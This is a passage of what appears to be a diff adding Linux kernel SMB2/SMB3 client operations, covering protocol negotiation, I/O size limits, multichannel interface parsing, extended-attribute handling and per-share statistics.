++	}
++
++	spin_lock(&server->mid_lock);
++	list_for_each_entry(mid, &server->pending_mid_q, qhead) {
++		if ((mid->mid == wire_mid) &&
++		    (mid->mid_state == MID_REQUEST_SUBMITTED) &&
++		    (mid->command == shdr->Command)) {
++			kref_get(&mid->refcount);
++			if (dequeue) {
++				list_del_init(&mid->qhead);
++				mid->mid_flags |= MID_DELETED;
++			}
++			spin_unlock(&server->mid_lock);
++			return mid;
++		}
++	}
++	spin_unlock(&server->mid_lock);
++	return NULL;
++}
++
++static struct mid_q_entry *
++smb2_find_mid(struct TCP_Server_Info *server, char *buf)
++{
++	return __smb2_find_mid(server, buf, false);
++}
++
++static struct mid_q_entry *
++smb2_find_dequeue_mid(struct TCP_Server_Info *server, char *buf)
++{
++	return __smb2_find_mid(server, buf, true);
++}
++
++static void
++smb2_dump_detail(void *buf, struct TCP_Server_Info *server)
++{
++#ifdef CONFIG_CIFS_DEBUG2
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++
++	cifs_server_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Mid: %llu Pid: %d\n",
++		 shdr->Command, shdr->Status, shdr->Flags, shdr->MessageId,
++		 shdr->Id.SyncId.ProcessId);
++	cifs_server_dbg(VFS, "smb buf %p len %u\n", buf,
++		 server->ops->calc_smb_size(buf));
++#endif
++}
++
++static bool
++smb2_need_neg(struct TCP_Server_Info *server)
++{
++	return server->max_read == 0;
++}
++
++static int
++smb2_negotiate(const unsigned int xid,
++	       struct cifs_ses *ses,
++	       struct TCP_Server_Info *server)
++{
++	int rc;
++
++	spin_lock(&server->mid_lock);
++	server->CurrentMid = 0;
++	spin_unlock(&server->mid_lock);
++	rc = SMB2_negotiate(xid, ses, server);
++	/* BB we probably don't need to retry with modern servers */
++	if (rc == -EAGAIN)
++		rc = -EHOSTDOWN;
++	return rc;
++}
++
++static unsigned int
++smb2_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int wsize;
++
++	/* start with specified wsize, or default */
++	wsize = ctx->wsize ? ctx->wsize : CIFS_DEFAULT_IOSIZE;
++	wsize = min_t(unsigned int, wsize, server->max_write);
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		wsize = min_t(unsigned int, wsize, SMB2_MAX_BUFFER_SIZE);
++
++	return wsize;
++}
++
++static unsigned int
++smb3_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int wsize;
++
++	/* start with specified wsize, or default */
++	wsize = ctx->wsize ? ctx->wsize : SMB3_DEFAULT_IOSIZE;
++	wsize = min_t(unsigned int, wsize, server->max_write);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (server->rdma) {
++		if (server->sign)
++			/*
++			 * Account for SMB2 data transfer packet header and
++			 * possible encryption header
++			 */
++			wsize = min_t(unsigned int,
++				wsize,
++				server->smbd_conn->max_fragmented_send_size -
++					SMB2_READWRITE_PDU_HEADER_SIZE -
++					sizeof(struct smb2_transform_hdr));
++		else
++			wsize = min_t(unsigned int,
++				wsize, server->smbd_conn->max_readwrite_size);
++	}
++#endif
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		wsize = min_t(unsigned int, wsize, SMB2_MAX_BUFFER_SIZE);
++
++	return wsize;
++}
++
++static unsigned int
++smb2_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int rsize;
++
++	/* start with specified rsize, or default */
++	rsize = ctx->rsize ? ctx->rsize : CIFS_DEFAULT_IOSIZE;
++	rsize = min_t(unsigned int, rsize, server->max_read);
++
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		rsize = min_t(unsigned int, rsize, SMB2_MAX_BUFFER_SIZE);
++
++	return rsize;
++}
++
++static unsigned int
++smb3_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int rsize;
++
++	/* start with specified rsize, or default */
++	rsize = ctx->rsize ? ctx->rsize : SMB3_DEFAULT_IOSIZE;
++	rsize = min_t(unsigned int, rsize, server->max_read);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	if (server->rdma) {
++		if (server->sign)
++			/*
++			 * Account for SMB2 data transfer packet header and
++			 * possible encryption header
++			 */
++			rsize = min_t(unsigned int,
++				rsize,
++				server->smbd_conn->max_fragmented_recv_size -
++					SMB2_READWRITE_PDU_HEADER_SIZE -
++					sizeof(struct smb2_transform_hdr));
++		else
++			rsize = min_t(unsigned int,
++				rsize, server->smbd_conn->max_readwrite_size);
++	}
++#endif
++
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		rsize = min_t(unsigned int, rsize, SMB2_MAX_BUFFER_SIZE);
++
++	return rsize;
++}
++
++static int
++parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
++			size_t buf_len, struct cifs_ses *ses, bool in_mount)
++{
++	struct network_interface_info_ioctl_rsp *p;
++	struct sockaddr_in *addr4;
++	struct sockaddr_in6 *addr6;
++	struct iface_info_ipv4 *p4;
++	struct iface_info_ipv6 *p6;
++	struct cifs_server_iface *info = NULL, *iface = NULL, *niface = NULL;
++	struct cifs_server_iface tmp_iface;
++	ssize_t bytes_left;
++	size_t next = 0;
++	int nb_iface = 0;
++	int rc = 0, ret = 0;
++
++	bytes_left = buf_len;
++	p = buf;
++
++	spin_lock(&ses->iface_lock);
++	/* do not query too frequently, this time with lock held */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ))) {
++		spin_unlock(&ses->iface_lock);
++		return 0;
++	}
++
++	/*
++	 * Go through iface_list and do kref_put to remove
++	 * any unused ifaces. ifaces in use will be removed
++	 * when the last user calls a kref_put on it
++	 */
++	list_for_each_entry_safe(iface, niface, &ses->iface_list,
++				 iface_head) {
++		iface->is_active = 0;
++		kref_put(&iface->refcount, release_iface);
++		ses->iface_count--;
++	}
++	spin_unlock(&ses->iface_lock);
++
++	/*
++	 * Samba server e.g. can return an empty interface list in some cases,
++	 * which would only be a problem if we were requesting multichannel
++	 */
++	if (bytes_left == 0) {
++		/* avoid spamming logs every 10 minutes, so log only in mount */
++		if ((ses->chan_max > 1) && in_mount)
++			cifs_dbg(VFS,
++				 "multichannel not available\n"
++				 "Empty network interface list returned by server %s\n",
++				 ses->server->hostname);
++		rc = -EINVAL;
++		goto out;
++	}
++
++	while (bytes_left >= sizeof(*p)) {
++		memset(&tmp_iface, 0, sizeof(tmp_iface));
++		tmp_iface.speed = le64_to_cpu(p->LinkSpeed);
++		tmp_iface.rdma_capable = le32_to_cpu(p->Capability & RDMA_CAPABLE) ? 1 : 0;
++		tmp_iface.rss_capable = le32_to_cpu(p->Capability & RSS_CAPABLE) ? 1 : 0;
++
++		switch (p->Family) {
++		/*
++		 * The kernel and wire socket structures have the same
++		 * layout and use network byte order but make the
++		 * conversion explicit in case either one changes.
++		 */
++		case INTERNETWORK:
++			addr4 = (struct sockaddr_in *)&tmp_iface.sockaddr;
++			p4 = (struct iface_info_ipv4 *)p->Buffer;
++			addr4->sin_family = AF_INET;
++			memcpy(&addr4->sin_addr, &p4->IPv4Address, 4);
++
++			/* [MS-SMB2] 2.2.32.5.1.1 Clients MUST ignore these */
++			addr4->sin_port = cpu_to_be16(CIFS_PORT);
++
++			cifs_dbg(FYI, "%s: ipv4 %pI4\n", __func__,
++				 &addr4->sin_addr);
++			break;
++		case INTERNETWORKV6:
++			addr6 =	(struct sockaddr_in6 *)&tmp_iface.sockaddr;
++			p6 = (struct iface_info_ipv6 *)p->Buffer;
++			addr6->sin6_family = AF_INET6;
++			memcpy(&addr6->sin6_addr, &p6->IPv6Address, 16);
++
++			/* [MS-SMB2] 2.2.32.5.1.2 Clients MUST ignore these */
++			addr6->sin6_flowinfo = 0;
++			addr6->sin6_scope_id = 0;
++			addr6->sin6_port = cpu_to_be16(CIFS_PORT);
++
++			cifs_dbg(FYI, "%s: ipv6 %pI6\n", __func__,
++				 &addr6->sin6_addr);
++			break;
++		default:
++			cifs_dbg(VFS,
++				 "%s: skipping unsupported socket family\n",
++				 __func__);
++			goto next_iface;
++		}
++
++		/*
++		 * The iface_list is assumed to be sorted by speed.
++		 * Check if the new interface exists in that list.
++		 * NEVER change iface. it could be in use.
++		 * Add a new one instead
++		 */
++		spin_lock(&ses->iface_lock);
++		iface = niface = NULL;
++		list_for_each_entry_safe(iface, niface, &ses->iface_list,
++					 iface_head) {
++			ret = iface_cmp(iface, &tmp_iface);
++			if (!ret) {
++				/* just get a ref so that it doesn't get picked/freed */
++				iface->is_active = 1;
++				kref_get(&iface->refcount);
++				ses->iface_count++;
++				spin_unlock(&ses->iface_lock);
++				goto next_iface;
++			} else if (ret < 0) {
++				/* all remaining ifaces are slower */
++				kref_get(&iface->refcount);
++				break;
++			}
++		}
++		spin_unlock(&ses->iface_lock);
++
++		/* no match. insert the entry in the list */
++		info = kmalloc(sizeof(struct cifs_server_iface),
++			       GFP_KERNEL);
++		if (!info) {
++			rc = -ENOMEM;
++			goto out;
++		}
++		memcpy(info, &tmp_iface, sizeof(tmp_iface));
++
++		/* add this new entry to the list */
++		kref_init(&info->refcount);
++		info->is_active = 1;
++
++		cifs_dbg(FYI, "%s: adding iface %zu\n", __func__, ses->iface_count);
++		cifs_dbg(FYI, "%s: speed %zu bps\n", __func__, info->speed);
++		cifs_dbg(FYI, "%s: capabilities 0x%08x\n", __func__,
++			 le32_to_cpu(p->Capability));
++
++		spin_lock(&ses->iface_lock);
++		if (!list_entry_is_head(iface, &ses->iface_list, iface_head)) {
++			list_add_tail(&info->iface_head, &iface->iface_head);
++			kref_put(&iface->refcount, release_iface);
++		} else
++			list_add_tail(&info->iface_head, &ses->iface_list);
++
++		ses->iface_count++;
++		spin_unlock(&ses->iface_lock);
++		ses->iface_last_update = jiffies;
++next_iface:
++		nb_iface++;
++		next = le32_to_cpu(p->Next);
++		if (!next) {
++			bytes_left -= sizeof(*p);
++			break;
++		}
++		p = (struct network_interface_info_ioctl_rsp *)((u8 *)p+next);
++		bytes_left -= next;
++	}
++
++	if (!nb_iface) {
++		cifs_dbg(VFS, "%s: malformed interface info\n", __func__);
++		rc = -EINVAL;
++		goto out;
++	}
++
++	/* Azure rounds the buffer size up 8, to a 16 byte boundary */
++	if ((bytes_left > 8) || p->Next)
++		cifs_dbg(VFS, "%s: incomplete interface info\n", __func__);
++
++
++	if (!ses->iface_count) {
++		rc = -EINVAL;
++		goto out;
++	}
++
++out:
++	return rc;
++}
++
++int
++SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_mount)
++{
++	int rc;
++	unsigned int ret_data_len = 0;
++	struct network_interface_info_ioctl_rsp *out_buf = NULL;
++	struct cifs_ses *ses = tcon->ses;
++
++	/* do not query too frequently */
++	if (ses->iface_last_update &&
++	    time_before(jiffies, ses->iface_last_update +
++			(SMB_INTERFACE_POLL_INTERVAL * HZ)))
++		return 0;
++
++	rc = SMB2_ioctl(xid, tcon, NO_FILE_ID, NO_FILE_ID,
++			FSCTL_QUERY_NETWORK_INTERFACE_INFO,
++			NULL /* no data input */, 0 /* no data input */,
++			CIFSMaxBufSize, (char **)&out_buf, &ret_data_len);
++	if (rc == -EOPNOTSUPP) {
++		cifs_dbg(FYI,
++			 "server does not support query network interfaces\n");
++		ret_data_len = 0;
++	} else if (rc != 0) {
++		cifs_tcon_dbg(VFS, "error %d on ioctl to get interface list\n", rc);
++		goto out;
++	}
++
++	rc = parse_server_interfaces(out_buf, ret_data_len, ses, in_mount);
++	if (rc)
++		goto out;
++
++out:
++	kfree(out_buf);
++	return rc;
++}
++
++static void
++smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
++	      struct cifs_sb_info *cifs_sb)
++{
++	int rc;
++	__le16 srch_path = 0; /* Null - open root of share */
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	struct cached_fid *cfid = NULL;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = "",
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = open_cached_dir(xid, tcon, "", cifs_sb, false, &cfid);
++	if (rc == 0)
++		memcpy(&fid, &cfid->fid, sizeof(struct cifs_fid));
++	else
++		rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
++			       NULL, NULL);
++	if (rc)
++		return;
++
++	SMB3_request_interfaces(xid, tcon, true /* called during  mount */);
++
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_ATTRIBUTE_INFORMATION);
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_DEVICE_INFORMATION);
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_VOLUME_INFORMATION);
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_SECTOR_SIZE_INFORMATION); /* SMB3 specific */
++	if (cfid == NULL)
++		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++	else
++		close_cached_dir(cfid);
++}
++
++static void
++smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
++	      struct cifs_sb_info *cifs_sb)
++{
++	int rc;
++	__le16 srch_path = 0; /* Null - open root of share */
++	u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = "",
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
++		       NULL, NULL);
++	if (rc)
++		return;
++
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_ATTRIBUTE_INFORMATION);
++	SMB2_QFS_attr(xid, tcon, fid.persistent_fid, fid.volatile_fid,
++			FS_DEVICE_INFORMATION);
++	SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++}
++
++static int
++smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
++			struct cifs_sb_info *cifs_sb, const char *full_path)
++{
++	__le16 *utf16_path;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	int err_buftype = CIFS_NO_BUFFER;
++	struct cifs_open_parms oparms;
++	struct kvec err_iov = {};
++	struct cifs_fid fid;
++	struct cached_fid *cfid;
++	bool islink;
++	int rc, rc2;
++
++	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, true, &cfid);
++	if (!rc) {
++		if (cfid->has_lease) {
++			close_cached_dir(cfid);
++			return 0;
++		}
++		close_cached_dir(cfid);
++	}
++
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = full_path,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
++		       &err_iov, &err_buftype);
++	if (rc) {
++		struct smb2_hdr *hdr = err_iov.iov_base;
++
++		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
++			goto out;
++
++		if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
++		}
++		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
++			rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	rc = SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
++
++out:
++	free_rsp_buf(err_buftype, err_iov.iov_base);
++	kfree(utf16_path);
++	return rc;
++}
++
++static int smb2_get_srv_inum(const unsigned int xid, struct cifs_tcon *tcon,
++			     struct cifs_sb_info *cifs_sb, const char *full_path,
++			     u64 *uniqueid, struct cifs_open_info_data *data)
++{
++	*uniqueid = le64_to_cpu(data->fi.IndexNumber);
++	return 0;
++}
++
++static int smb2_query_file_info(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifsFileInfo *cfile, struct cifs_open_info_data *data)
++{
++	struct cifs_fid *fid = &cfile->fid;
++
++	if (cfile->symlink_target) {
++		data->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++		if (!data->symlink_target)
++			return -ENOMEM;
++	}
++	return SMB2_query_info(xid, tcon, fid->persistent_fid, fid->volatile_fid, &data->fi);
++}
++
++#ifdef CONFIG_CIFS_XATTR
++static ssize_t
++move_smb2_ea_to_cifs(char *dst, size_t dst_size,
++		     struct smb2_file_full_ea_info *src, size_t src_size,
++		     const unsigned char *ea_name)
++{
++	int rc = 0;
++	unsigned int ea_name_len = ea_name ? strlen(ea_name) : 0;
++	char *name, *value;
++	size_t buf_size = dst_size;
++	size_t name_len, value_len, user_name_len;
++
++	while (src_size > 0) {
++		name_len = (size_t)src->ea_name_length;
++		value_len = (size_t)le16_to_cpu(src->ea_value_length);
++
++		if (name_len == 0)
++			break;
++
++		if (src_size < 8 + name_len + 1 + value_len) {
++			cifs_dbg(FYI, "EA entry goes beyond length of list\n");
++			rc = -EIO;
++			goto out;
++		}
++
++		name = &src->ea_data[0];
++		value = &src->ea_data[src->ea_name_length + 1];
++
++		if (ea_name) {
++			if (ea_name_len == name_len &&
++			    memcmp(ea_name, name, name_len) == 0) {
++				rc = value_len;
++				if (dst_size == 0)
++					goto out;
++				if (dst_size < value_len) {
++					rc = -ERANGE;
++					goto out;
++				}
++				memcpy(dst, value, value_len);
++				goto out;
++			}
++		} else {
++			/* 'user.' plus a terminating null */
++			user_name_len = 5 + 1 + name_len;
++
++			if (buf_size == 0) {
++				/* skip copy - calc size only */
++				rc += user_name_len;
++			} else if (dst_size >= user_name_len) {
++				dst_size -= user_name_len;
++				memcpy(dst, "user.", 5);
++				dst += 5;
++				memcpy(dst, src->ea_data, name_len);
++				dst += name_len;
++				*dst = 0;
++				++dst;
++				rc += user_name_len;
++			} else {
++				/* stop before overrun buffer */
++				rc = -ERANGE;
++				break;
++			}
++		}
++
++		if (!src->next_entry_offset)
++			break;
++
++		if (src_size < le32_to_cpu(src->next_entry_offset)) {
++			/* stop before overrun buffer */
++			rc = -ERANGE;
++			break;
++		}
++		src_size -= le32_to_cpu(src->next_entry_offset);
++		src = (void *)((char *)src +
++			       le32_to_cpu(src->next_entry_offset));
++	}
++
++	/* didn't find the named attribute */
++	if (ea_name)
++		rc = -ENODATA;
++
++out:
++	return (ssize_t)rc;
++}
++
++static ssize_t
++smb2_query_eas(const unsigned int xid, struct cifs_tcon *tcon,
++	       const unsigned char *path, const unsigned char *ea_name,
++	       char *ea_data, size_t buf_size,
++	       struct cifs_sb_info *cifs_sb)
++{
++	int rc;
++	struct kvec rsp_iov = {NULL, 0};
++	int buftype = CIFS_NO_BUFFER;
++	struct smb2_query_info_rsp *rsp;
++	struct smb2_file_full_ea_info *info = NULL;
++
++	rc = smb2_query_info_compound(xid, tcon, path,
++				      FILE_READ_EA,
++				      FILE_FULL_EA_INFORMATION,
++				      SMB2_O_INFO_FILE,
++				      CIFSMaxBufSize -
++				      MAX_SMB2_CREATE_RESPONSE_SIZE -
++				      MAX_SMB2_CLOSE_RESPONSE_SIZE,
++				      &rsp_iov, &buftype, cifs_sb);
++	if (rc) {
++		/*
++		 * If ea_name is NULL (listxattr) and there are no EAs,
++		 * return 0 as it's not an error. Otherwise, the specified
++		 * ea_name was not found.
++		 */
++		if (!ea_name && rc == -ENODATA)
++			rc = 0;
++		goto qeas_exit;
++	}
++
++	rsp = (struct smb2_query_info_rsp *)rsp_iov.iov_base;
++	rc = smb2_validate_iov(le16_to_cpu(rsp->OutputBufferOffset),
++			       le32_to_cpu(rsp->OutputBufferLength),
++			       &rsp_iov,
++			       sizeof(struct smb2_file_full_ea_info));
++	if (rc)
++		goto qeas_exit;
++
++	info = (struct smb2_file_full_ea_info *)(
++			le16_to_cpu(rsp->OutputBufferOffset) + (char *)rsp);
++	rc = move_smb2_ea_to_cifs(ea_data, buf_size, info,
++			le32_to_cpu(rsp->OutputBufferLength), ea_name);
++
++ qeas_exit:
++	free_rsp_buf(buftype, rsp_iov.iov_base);
++	return rc;
++}
++
++
++static int
++smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
++	    const char *path, const char *ea_name, const void *ea_value,
++	    const __u16 ea_value_len, const struct nls_table *nls_codepage,
++	    struct cifs_sb_info *cifs_sb)
++{
++	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++	__le16 *utf16_path = NULL;
++	int ea_name_len = strlen(ea_name);
++	int flags = CIFS_CP_CREATE_CLOSE_OP;
++	int len;
++	struct smb_rqst rqst[3];
++	int resp_buftype[3];
++	struct kvec rsp_iov[3];
++	struct kvec open_iov[SMB2_CREATE_IOV_SIZE];
++	struct cifs_open_parms oparms;
++	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
++	struct cifs_fid fid;
++	struct kvec si_iov[SMB2_SET_INFO_IOV_SIZE];
++	unsigned int size[1];
++	void *data[1];
++	struct smb2_file_full_ea_info *ea = NULL;
++	struct kvec close_iov[1];
++	struct smb2_query_info_rsp *rsp;
++	int rc, used_len = 0;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	if (ea_name_len > 255)
++		return -EINVAL;
++
++	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	memset(rqst, 0, sizeof(rqst));
++	resp_buftype[0] = resp_buftype[1] = resp_buftype[2] = CIFS_NO_BUFFER;
++	memset(rsp_iov, 0, sizeof(rsp_iov));
++
++	if (ses->server->ops->query_all_EAs) {
++		if (!ea_value) {
++			rc = ses->server->ops->query_all_EAs(xid, tcon, path,
++							     ea_name, NULL, 0,
++							     cifs_sb);
++			if (rc == -ENODATA)
++				goto sea_exit;
++		} else {
++			/* If we are adding a attribute we should first check
++			 * if there will be enough space available to store
++			 * the new EA. If not we should not add it since we
++			 * would not be able to even read the EAs back.
++			 */
++			rc = smb2_query_info_compound(xid, tcon, path,
++				      FILE_READ_EA,
++				      FILE_FULL_EA_INFORMATION,
++				      SMB2_O_INFO_FILE,
++				      CIFSMaxBufSize -
++				      MAX_SMB2_CREATE_RESPONSE_SIZE -
++				      MAX_SMB2_CLOSE_RESPONSE_SIZE,
++				      &rsp_iov[1], &resp_buftype[1], cifs_sb);
++			if (rc == 0) {
++				rsp = (struct smb2_query_info_rsp *)rsp_iov[1].iov_base;
++				used_len = le32_to_cpu(rsp->OutputBufferLength);
++			}
++			free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++			resp_buftype[1] = CIFS_NO_BUFFER;
++			memset(&rsp_iov[1], 0, sizeof(rsp_iov[1]));
++			rc = 0;
++
++			/* Use a fudge factor of 256 bytes in case we collide
++			 * with a different set_EAs command.
++			 */
++			if(CIFSMaxBufSize - MAX_SMB2_CREATE_RESPONSE_SIZE -
++			   MAX_SMB2_CLOSE_RESPONSE_SIZE - 256 <
++			   used_len + ea_name_len + ea_value_len + 1) {
++				rc = -ENOSPC;
++				goto sea_exit;
++			}
++		}
++	}
++
++	/* Open */
++	memset(&open_iov, 0, sizeof(open_iov));
++	rqst[0].rq_iov = open_iov;
++	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.path = path,
++		.desired_access = FILE_WRITE_EA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
++
++	rc = SMB2_open_init(tcon, server,
++			    &rqst[0], &oplock, &oparms, utf16_path);
++	if (rc)
++		goto sea_exit;
++	smb2_set_next_command(tcon, &rqst[0]);
++
++
++	/* Set Info */
++	memset(&si_iov, 0, sizeof(si_iov));
++	rqst[1].rq_iov = si_iov;
++	rqst[1].rq_nvec = 1;
++
++	len = sizeof(*ea) + ea_name_len + ea_value_len + 1;
++	ea = kzalloc(len, GFP_KERNEL);
++	if (ea == NULL) {
++		rc = -ENOMEM;
++		goto sea_exit;
++	}
++
++	ea->ea_name_length = ea_name_len;
++	ea->ea_value_length = cpu_to_le16(ea_value_len);
++	memcpy(ea->ea_data, ea_name, ea_name_len + 1);
++	memcpy(ea->ea_data + ea_name_len + 1, ea_value, ea_value_len);
++
++	size[0] = len;
++	data[0] = ea;
++
++	rc = SMB2_set_info_init(tcon, server,
++				&rqst[1], COMPOUND_FID,
++				COMPOUND_FID, current->tgid,
++				FILE_FULL_EA_INFORMATION,
++				SMB2_O_INFO_FILE, 0, data, size);
++	if (rc)
++		goto sea_exit;
++	smb2_set_next_command(tcon, &rqst[1]);
++	smb2_set_related(&rqst[1]);
++
++
++	/* Close */
++	memset(&close_iov, 0, sizeof(close_iov));
++	rqst[2].rq_iov = close_iov;
++	rqst[2].rq_nvec = 1;
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[2], COMPOUND_FID, COMPOUND_FID, false);
++	if (rc)
++		goto sea_exit;
++	smb2_set_related(&rqst[2]);
++
++	rc = compound_send_recv(xid, ses, server,
++				flags, 3, rqst,
++				resp_buftype, rsp_iov);
++	/* no need to bump num_remote_opens because handle immediately closed */
++
++ sea_exit:
++	kfree(ea);
++	kfree(utf16_path);
++	SMB2_open_free(&rqst[0]);
++	SMB2_set_info_free(&rqst[1]);
++	SMB2_close_free(&rqst[2]);
++	free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++	free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++	free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	return rc;
++}
++#endif
++
++static bool
++smb2_can_echo(struct TCP_Server_Info *server)
++{
++	return server->echoes;
++}
++
++static void
++smb2_clear_stats(struct cifs_tcon *tcon)
++{
++	int i;
++
++	for (i = 0; i < NUMBER_OF_SMB2_COMMANDS; i++) {
++		atomic_set(&tcon->stats.smb2_stats.smb2_com_sent[i], 0);
++		atomic_set(&tcon->stats.smb2_stats.smb2_com_failed[i], 0);
++	}
++}
++
++static void
++smb2_dump_share_caps(struct seq_file *m, struct cifs_tcon *tcon)
++{
++	seq_puts(m, "\n\tShare Capabilities:");
++	if (tcon->capabilities & SMB2_SHARE_CAP_DFS)
++		seq_puts(m, " DFS,");
++	if (tcon->capabilities & SMB2_SHARE_CAP_CONTINUOUS_AVAILABILITY)
++		seq_puts(m, " CONTINUOUS AVAILABILITY,");
++	if (tcon->capabilities & SMB2_SHARE_CAP_SCALEOUT)
++		seq_puts(m, " SCALEOUT,");
++	if (tcon->capabilities & SMB2_SHARE_CAP_CLUSTER)
++		seq_puts(m, " CLUSTER,");
++	if (tcon->capabilities & SMB2_SHARE_CAP_ASYMMETRIC)
++		seq_puts(m, " ASYMMETRIC,");
++	if (tcon->capabilities == 0)
++		seq_puts(m, " None");
++	if (tcon->ss_flags & SSINFO_FLAGS_ALIGNED_DEVICE)
++		seq_puts(m, " Aligned,");
++	if (tcon->ss_flags & SSINFO_FLAGS_PARTITION_ALIGNED_ON_DEVICE)
++		seq_puts(m, " Partition Aligned,");
++	if (tcon->ss_flags & SSINFO_FLAGS_NO_SEEK_PENALTY)
++		seq_puts(m, " SSD,");
++	if (tcon->ss_flags & SSINFO_FLAGS_TRIM_ENABLED)
++		seq_puts(m, " TRIM-support,");
++
++	seq_printf(m, "\tShare Flags: 0x%x", tcon->share_flags);
++	seq_printf(m, "\n\ttid: 0x%x", tcon->tid);
++	if (tcon->perf_sector_size)
++		seq_printf(m, "\tOptimal sector size: 0x%x",
++			   tcon->perf_sector_size);
++	seq_printf(m, "\tMaximal Access: 0x%x", tcon->maximal_access);
++}
++
++static void
++smb2_print_stats(struct seq_file *m, struct cifs_tcon *tcon)
++{
++	atomic_t *sent = tcon->stats.smb2_stats.smb2_com_sent;
++	atomic_t *failed = tcon->stats.smb2_stats.smb2_com_failed;
++
++	/*
++	 *  Can't display SMB2_NEGOTIATE, SESSION_SETUP, LOGOFF, CANCEL and ECHO
++	 *  totals (requests sent) since those SMBs are per-session not per tcon
++	 */
++	seq_printf(m, "\nBytes read: %llu  Bytes written: %llu",
++		   (long long)(tcon->bytes_read),
++		   (long long)(tcon->bytes_written));
++	seq_printf(m, "\nOpen files: %d total (local), %d open on server",
++		   atomic_read(&tcon->num_local_opens),
++		   atomic_read(&tcon->num_remote_opens));
++	seq_printf(m, "\nTreeConnects: %d total %d failed",
++		   atomic_read(&sent[SMB2_TREE_CONNECT_HE]),
++		   atomic_read(&failed[SMB2_TREE_CONNECT_HE]));
++	seq_printf(m, "\nTreeDisconnects: %d total %d failed",
